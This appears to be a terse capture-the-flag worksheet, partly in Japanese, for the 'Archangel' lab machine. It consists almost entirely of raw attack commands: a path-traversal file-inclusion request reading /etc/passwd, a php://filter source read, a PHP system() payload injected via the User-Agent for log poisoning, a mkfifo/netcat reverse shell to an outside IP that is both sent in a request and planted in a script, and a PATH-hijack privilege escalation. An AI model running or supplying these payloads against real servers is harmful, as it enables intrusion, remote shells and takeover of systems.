GET /test.php?view=/var/www/html/development_testing/..//..//..//..//etc/passwd
/home/archangel/user.txt
が露出していたので先に見る?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
”User-Agent: <?php system($_GET['cmd']); ?>”
GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var//log/apache2/access.log&cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|sh+-i+2>%261|nc+10.18.127.137+1234+>/tmp/f HTTP/1.1
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.18.127.137 4444 >/tmp/f” > /opt/hellowold.sh
cp /home/user/archangel/myfiles/* /opt/backupfile
`archangel@ubuntu:~/secret$ $PATH bash: /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin: No such file or directory
archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH
archangel@ubuntu:/tmp$ $PATH $PATH bash: /tmp:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin: No such file or directory`
`archangel@ubuntu:/tmp$ echo "/bin/bash" > cp echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ cat cp cat cp /bin/bash`